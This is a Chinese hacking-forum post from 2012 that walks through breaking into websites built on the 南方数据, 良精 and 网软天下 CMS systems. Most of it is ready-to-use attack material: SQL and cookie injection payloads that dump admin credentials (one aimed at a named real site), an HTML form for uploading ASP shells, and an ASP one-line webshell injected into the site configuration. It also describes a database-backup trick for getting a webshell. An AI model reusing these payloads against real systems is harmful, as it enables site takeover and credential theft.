找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2317|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb
& h! \5 u/ u: |) O, C5 Z) v) p1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 " K1 i1 z( a4 }4 {) Z5 v& A
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
! I1 l& H6 W) Y& d8 ~直接暴管理员帐号密码(md5)
7 F3 t' l4 \' i% Q6 o2.登陆后台$ i3 ]3 {$ A' D- u6 t5 m9 r9 B, S9 h
3.利用编辑器上传:
- q- ]# u6 P/ E" {4 E! r) L访问admin/southidceditor/admin_style.asp7 Y& c8 x; @& |7 H
修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.4 V# c) v! [" w6 e' r$ e# C
  [! h& A) x8 H8 a: ~$ m0 T5 M
========================================2 {2 H0 z3 x. u, E% C

5 Q4 N; c) |7 m, i. W0 B参考资料整理:
/ q7 ]6 x' D* i& t. K) m; _; J+ W& @南方数据、良精系统、网软天下漏洞利用0 F, n+ A4 V( N8 a0 q3 e' a5 s! v
* O2 q. F( g( E& c& D# g
1、通过upfile_other.asp漏洞文件直接取SHELL- a% ^1 N& E) P. g9 z# u7 x
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:; h0 B; O: W& g4 R
<HTML><HEAD> 9 }$ u6 T( [, d  N; G
<META http-equiv=Content-Type content="text/html; charset=gb2312"> 5 z) C1 N1 I$ L
<STYLE type=text/css>BODY {
. P( o1 v2 Z' T$ d/ F: sFONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
9 j- |/ L6 n5 Q, |3 b. G2 F* E} 1 g1 @( n+ v2 [9 J
.tx1 { ) a  E8 n" }* ]# L/ I2 s
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
" ^, b& }5 |) ~& P}
- x3 B7 z0 V' U% }8 m% O( b</STYLE># N* B8 l9 j: T( x2 i* i
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
9 @1 a. m2 X# e1 w<BODY leftMargin=0 topMargin=0> , T# {8 ?; R4 z+ r8 `5 P
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post 0 `1 d7 e! r7 s8 e. @% B
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
4 q- u* Y* G: g; {  g<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>& j$ D$ H; c9 H3 E1 W

1 w3 e4 g/ E% `: J# B# h将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。7 x  v( e/ R0 v& F% O5 h" R0 K
注:此方法通杀南方数据、良精系统、网软天下等" I' `. g% t" }: o0 m

7 b, K3 B" ?0 z. Q/ ~6 j" ]1 u5 _2、通过注入秒杀管理员帐号密码,使用如下:
4 H: x% u. c+ [6 w: l- N; q. ^http://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’
3 w! m( G: r& Q: r* A以上代码直接暴管理员帐号和密码,取SHELL方法如下:
" Q% w, `, D- j1 _( N在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’4 v* d* W& E# r
成功把shell写入http://www.target.com/inc/config.asp' V0 ^; Q$ y* f- Y! r" H
这里一句话chr(32)密码是“#”; v& k1 b0 @4 p1 W+ I2 n- f
3、cookie注入
$ H! ^$ B; S9 J3 Q2 y* Z清空地址栏,利用union语句来注入,提交:. g+ C& r3 J& N6 L
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))7 T' `0 {8 @! k! ~- Z% n4 R
如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?
4 @; }8 `" ^. Q+ K$ }注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。
% f& G. h5 A% X) w3 q; E' p(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助). C0 @) s3 y, }( b
+ Y7 ^# e2 J1 y. p+ g
三、后台取SHELL方法总结
/ |! m" r; D- u+ q0 h) z% P. v' b(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:# b# g) K. s+ J* `& P5 a
然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,
8 {- T* {/ A% J  X; @这时再打开一句话马的客户端,提交同样得到一个小马
& x' e: |: t( q0 m(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)
/ L) G" \8 n( r' X(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:
  C$ M3 ]3 O* `' R5 S" s' P& y, H. Dif fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then/ {( P' I4 z* D# r# F
EnableUpload=false) ^" _5 b% m1 W: ?6 s% u! K; I
6 P2 B  Z' @- _$ q8 ^
end if - r/ D% h% l/ {2 y& Y
if EnableUpload=false then$ ?. j- f7 z' W
msg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType) S" G) \$ s- i5 H; r( @" L, R
FoundErr=true
1 ]2 t' n1 M; n5 S) \1 _end if
8 R' q& T% N3 O5 F2 K大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:: E" a: P5 Z  @4 A) @# R
提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)
; y! I# x1 e# J0 I2 O( s(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的7 c; i5 ?2 U8 y+ S: ?* g3 [! l
  ~6 @0 y$ s* P# W8 c- N" V
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的' q2 w/ H' e" r
直接访问备份后的地址,就得到一个webshell$ N$ P9 K1 C6 h9 m  t  r
(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表